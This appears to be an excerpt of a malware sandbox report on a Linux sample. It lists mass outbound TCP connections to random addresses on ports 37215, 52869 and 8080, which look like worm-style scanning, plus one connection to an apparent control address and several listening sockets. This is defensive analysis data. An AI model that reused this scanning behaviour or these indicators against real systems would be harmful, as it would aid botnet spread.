        Source: global trafficTCP traffic: 192.168.2.23:36087 -> 197.155.34.212:37215
        Source: global trafficTCP traffic: 192.168.2.23:36087 -> 197.66.21.161:37215
        Source: global trafficTCP traffic: 192.168.2.23:36087 -> 197.169.85.163:37215
        Source: global trafficTCP traffic: 192.168.2.23:36087 -> 197.218.226.111:37215
        Source: global trafficTCP traffic: 192.168.2.23:36087 -> 197.39.40.134:37215
        Source: global trafficTCP traffic: 192.168.2.23:36087 -> 197.184.33.91:37215
        Source: global trafficTCP traffic: 192.168.2.23:36087 -> 197.133.142.217:37215
        Source: global trafficTCP traffic: 192.168.2.23:36087 -> 197.67.66.90:37215
        Source: global trafficTCP traffic: 192.168.2.23:36087 -> 197.251.44.61:37215
        Source: global trafficTCP traffic: 192.168.2.23:36087 -> 197.38.140.191:37215
        Source: global trafficTCP traffic: 192.168.2.23:36087 -> 197.30.25.122:37215
        Source: global trafficTCP traffic: 192.168.2.23:36087 -> 197.223.38.178:37215
        Source: global trafficTCP traffic: 192.168.2.23:36087 -> 197.15.131.173:37215
        Source: global trafficTCP traffic: 192.168.2.23:36087 -> 197.4.173.35:37215
        Source: global trafficTCP traffic: 192.168.2.23:36087 -> 197.116.33.155:37215
        Source: global trafficTCP traffic: 192.168.2.23:58626 -> 103.136.43.52:6738
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 156.69.251.223:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 41.147.155.237:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 41.173.83.70:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 41.74.67.115:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 156.90.137.164:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 156.45.74.114:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 156.83.125.122:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 41.53.243.163:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 156.158.22.64:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 197.213.172.135:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 156.174.164.129:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 156.12.103.220:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 156.56.82.96:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 156.13.142.81:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 156.146.70.71:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 156.199.23.247:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 156.32.242.46:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 156.34.11.33:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 197.16.146.165:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 197.182.46.128:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 41.49.106.159:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 156.63.49.113:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 156.221.135.242:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 156.187.178.12:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 197.112.202.225:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 156.248.42.15:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 41.181.5.10:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 41.195.114.42:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 156.191.227.20:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 197.12.174.222:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 197.46.90.238:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 197.169.180.100:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 197.51.10.127:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 156.206.58.79:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 41.2.187.81:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 156.146.60.97:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 197.16.186.155:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 41.186.57.24:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 41.66.246.135:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 197.148.160.108:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 41.1.31.70:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 41.106.254.13:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 197.11.25.136:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 41.137.43.5:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 156.130.116.109:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 197.43.218.38:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 41.51.69.104:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 41.21.81.151:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 41.44.55.51:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 41.73.11.124:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 41.129.4.231:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 197.215.204.121:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 156.33.137.121:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 197.23.245.29:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 197.93.254.127:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 156.129.81.181:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 156.177.154.44:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 41.74.121.26:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 197.137.14.147:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 197.131.244.212:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 156.222.76.224:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 156.213.120.151:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 156.227.204.239:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 156.241.133.225:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 41.247.182.208:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 156.241.87.81:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 197.254.114.172:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 41.223.194.151:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 156.31.40.231:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 156.142.145.3:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 41.185.159.181:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 197.206.128.182:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 41.15.235.232:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 156.111.13.7:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 197.119.111.159:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 197.78.213.147:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 156.187.148.85:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 156.87.179.29:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 41.4.216.93:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 41.13.15.228:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 41.192.113.4:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 41.255.134.150:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 41.90.114.199:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 41.223.40.62:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 197.198.199.120:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 197.182.29.214:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 156.254.147.178:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 41.90.189.178:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 156.147.95.54:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 41.40.143.44:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 41.105.134.172:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 41.91.233.63:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 156.119.227.221:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 156.31.18.77:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 156.72.232.109:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 156.69.144.16:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 197.1.190.31:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 197.8.202.20:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 156.218.78.94:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 156.234.251.121:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 41.123.242.144:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 197.18.167.177:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 156.94.116.113:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 41.182.125.5:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 41.133.70.222:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 156.56.199.109:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 197.255.113.57:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 41.18.35.76:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 197.109.126.211:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 41.192.204.9:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 197.168.20.214:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 197.222.38.126:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 41.20.43.171:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 197.179.221.163:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 197.25.200.21:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 197.250.117.33:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 41.239.109.247:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 197.217.15.123:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 197.101.217.239:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 156.228.49.190:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 197.55.80.97:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 41.129.74.120:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 197.158.177.229:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 41.254.19.86:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 41.192.193.252:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 197.91.6.210:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 156.152.249.24:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 197.21.221.140:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 41.32.3.60:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 41.204.47.2:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 41.170.165.130:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 41.119.223.142:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 156.220.199.83:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 197.5.36.65:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 156.161.101.88:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 197.118.91.208:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 156.36.162.125:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 41.109.64.118:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 156.139.70.13:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 197.79.90.53:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 197.45.174.192:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 41.105.152.194:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 41.135.143.128:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 156.2.198.18:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 197.10.28.10:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 156.102.238.19:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 197.159.13.102:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 197.144.33.78:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 156.184.117.246:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 41.179.162.10:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 41.234.196.229:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 197.236.238.150:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 197.12.248.143:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 156.227.101.134:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 156.251.42.127:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 41.207.26.250:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 41.120.70.175:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 156.56.120.48:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 41.138.67.225:52869
        Source: global trafficTCP traffic: 192.168.2.23:52471 -> 197.148.247.181:52869
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 94.14.248.223:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 62.136.155.246:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 94.105.73.115:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 95.216.31.105:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 94.252.140.249:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 94.60.29.229:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 85.6.43.152:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 94.167.1.1:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 95.112.175.220:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 85.26.47.126:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 31.102.216.124:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 85.206.127.249:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 62.204.16.53:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 85.46.48.46:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 94.177.159.198:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 95.118.90.188:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 62.190.206.105:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 95.188.210.124:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 94.184.128.101:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 62.201.12.136:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 85.206.211.73:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 95.199.167.246:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 31.141.157.239:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 95.91.45.53:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 62.88.82.171:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 85.253.181.162:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 62.238.212.134:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 85.211.197.138:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 62.107.224.158:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 62.66.158.27:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 85.200.78.4:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 94.127.154.218:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 31.49.130.196:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 94.79.132.99:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 62.199.175.222:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 62.28.180.54:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 94.186.200.39:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 85.60.198.130:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 62.236.0.28:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 62.165.184.187:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 31.139.42.150:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 94.135.8.247:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 94.240.195.135:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 95.33.251.43:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 94.53.159.205:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 95.79.77.134:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 85.181.194.67:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 95.74.93.22:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 31.121.192.225:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 62.29.150.213:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 85.16.93.104:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 62.231.131.38:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 94.141.206.73:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 31.82.209.53:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 31.79.44.94:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 95.139.135.176:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 94.81.110.129:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 95.208.202.198:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 31.164.14.43:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 62.183.18.160:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 62.4.189.172:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 31.106.54.182:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 85.206.59.112:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 95.24.199.158:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 85.116.234.4:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 31.142.143.145:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 62.95.29.8:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 62.172.16.48:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 94.5.166.88:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 85.179.211.116:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 85.233.93.231:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 85.232.219.66:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 31.149.50.215:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 31.214.154.138:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 95.103.157.110:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 85.23.206.76:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 95.88.63.23:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 95.240.62.150:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 62.198.100.12:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 95.56.5.137:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 95.93.216.171:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 62.35.137.164:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 31.115.124.146:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 31.116.244.129:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 94.249.40.21:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 95.140.163.68:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 95.198.72.5:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 95.22.42.125:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 62.249.3.14:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 62.200.103.11:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 31.45.18.133:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 62.209.39.34:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 85.205.215.154:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 94.152.233.110:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 62.117.79.239:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 85.120.22.47:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 31.232.141.198:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 85.244.102.167:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 95.116.223.65:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 94.205.155.246:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 94.29.148.67:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 95.58.36.227:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 94.139.120.76:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 85.75.197.99:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 94.44.217.166:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 94.228.238.222:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 95.180.207.155:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 94.156.101.240:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 94.115.215.156:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 31.244.57.122:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 85.92.162.48:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 31.220.106.20:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 31.28.183.126:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 85.131.209.223:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 95.218.112.139:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 31.127.89.136:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 31.81.179.105:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 62.47.83.167:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 85.239.123.180:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 85.11.96.28:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 94.23.152.42:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 94.91.56.233:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 62.171.69.50:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 31.213.225.121:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 95.78.63.25:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 94.65.113.78:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 95.53.95.184:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 62.246.133.138:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 95.179.201.181:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 31.241.218.18:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 95.17.136.38:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 85.175.24.39:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 85.131.196.128:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 94.39.31.94:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 31.73.56.198:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 62.51.171.184:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 85.26.18.235:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 94.223.174.43:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 62.244.154.94:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 95.245.141.221:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 95.6.253.170:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 94.95.202.16:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 95.214.78.156:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 62.157.203.4:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 31.220.30.104:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 31.119.102.59:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 85.111.106.86:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 85.31.1.215:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 85.147.9.148:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 94.177.227.217:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 94.149.206.177:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 94.168.206.174:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 95.19.74.74:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 85.231.205.33:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 62.63.100.69:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 94.216.103.95:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 95.4.134.247:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 94.54.183.205:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 31.34.226.94:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 85.87.93.155:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 94.212.184.121:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 85.251.104.195:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 95.71.204.88:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 31.117.208.49:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 31.118.249.158:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 85.120.73.64:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 94.214.67.126:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 31.130.96.145:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 85.214.220.86:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 62.8.163.16:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 94.183.82.98:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 31.48.57.227:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 31.223.92.176:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 94.152.20.50:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 94.255.228.141:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 85.179.97.232:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 62.144.159.190:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 85.176.193.47:8080
        Source: global trafficTCP traffic: 192.168.2.23:42487 -> 62.77.42.170:8080
        Source: /tmp/qJlf2SjoW4 (PID: 6232)Socket: 127.0.0.1::45837
        Source: /tmp/qJlf2SjoW4 (PID: 6248)Socket: 0.0.0.0::52869
        Source: /tmp/qJlf2SjoW4 (PID: 6248)Socket: 0.0.0.0::8080
        Source: /tmp/qJlf2SjoW4 (PID: 6248)Socket: 0.0.0.0::443
        Source: /tmp/qJlf2SjoW4 (PID: 6248)Socket: 0.0.0.0::37215
        Source: /tmp/qJlf2SjoW4 (PID: 6248)Socket: 0.0.0.0::23
        Source: /tmp/qJlf2SjoW4 (PID: 6248)Socket: 0.0.0.0::80
        Source: /tmp/qJlf2SjoW4 (PID: 6248)Socket: 0.0.0.0::0
